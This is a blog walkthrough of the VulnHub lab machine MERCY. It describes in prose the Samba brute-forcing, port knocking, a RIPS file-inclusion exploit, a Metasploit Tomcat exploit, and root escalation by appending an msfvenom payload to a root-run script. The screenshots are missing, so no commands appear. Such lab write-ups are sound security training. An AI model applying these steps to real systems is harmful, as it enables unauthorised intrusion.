AdSense

Wednesday, December 26, 2018

MERCY


MERCY

 - Layout for this exercise:




1 - INTRODUCTION

 - The goal of this exercise is to develop a hacking process for the vulnerable machine MERCY.

 - MERCY can be found here:

 https://www.vulnhub.com/entry/digitalworldlocal-mercy,263/

 - Once downloaded and extracted with VirtualBox:



2 - ENUMERATION

 - Discovering MERCY's IP:





- Scanning with Nmap:




- Going deeper within port 8080 HTTP, it seems that Apache Tomcat/Coyote engine JSP 1.1 is being run:
- Dirbusting the web server at port 8080:


- So we have some interesting folders to explore, like robots.txt, /tryharder/tryharder and /manager.

 - Connecting with the browser:



 - Reading robots.txt:


- Checking folder /tryharder/tryharder we find a string encoded with Base64:


- Decoding:


- From the message we can write down that it might be a use with password password.

 - Going to /manager:

- Also, port 445 is open, so why not enumerating with enum4linux taking advantage of the Samba server?







- So there are 4 Local Users: pleadformercy, qiu, thisisasuperduperlonguser, fluffy.

- Launching Hydra over the Samba server with the text file usernames and the wordlist rockyou.txt:




- Connecting to the Samba server with credentials qiu:password" (remembering the Base64 decoded string):


- Listing contents:


- Getting .bash_history:
 - Goint to folder .private:



- Getting readme.txt:





- Going to secrets there is nothing inside:

- Going to folder opensesame and getting configprint and config:


- Reading .bash_history


- Reading readme.txt:


- Reading configprint, there are a lot of references to config:


- Reading config we find information about filtered services HTTP at port 80 and SSH port 22:


- Actually both ports 22, 80 are filtered:



- Because several sequences are quoted we can imagine that knock command must be used to open filtered services, for instance HTTP port 80:


- Same thing for SSH port 22:



- Now, connection with the browser is available:



- Dirbusting port 80:



- Reading robots.txt we discover two additional folders: /mercy and /nomercy:


- Going to /mercy:








- Going to /nomercy the RIPS 0.53 application is running:



3 - EXPLOITATION

- Searching for RIPS exploits we find a Multiple LFI exploit:




- Reading 18660.txt:

- Applying the LFI to /etc/passwd:
- However it doesn't work with /etc/shadow:

- Remembering the existence of a tomcat-users.xml file:



- Extracting tomcat-users.xml:



- Last lines give unvaluable information about 2 users and correspondent usernames:



4 - GETTING A SHELL WITH METASPLOIT

 - Launching Metasploit:

- Using this exploit for Tomcat:


- Setting options and running the exploit we get a Meterpreter session:



- Spawning and improving a shell:

5 - PRIVILEGE ESCALATION

 - Using credentials fluffy:freakishfluffybunny:

- Unfortunately fluffy is not a sudoer:

- Improving the shell for fluffy:


- Walking around into home folders and files until finding something useful:











- Finally it seems that timeclok could be interesting, because it is a root owned script:


- Creating an exploit with Msfvenom:



- Setting a Netcat listener:





- Appending the exploit to timeclock:







- After some minutes we've got a root shell:







6 - CAPTURING THE FLAG

 - Reading proof.txt:









Posted by at
Labels:
Subscribe to: Posts (Atom)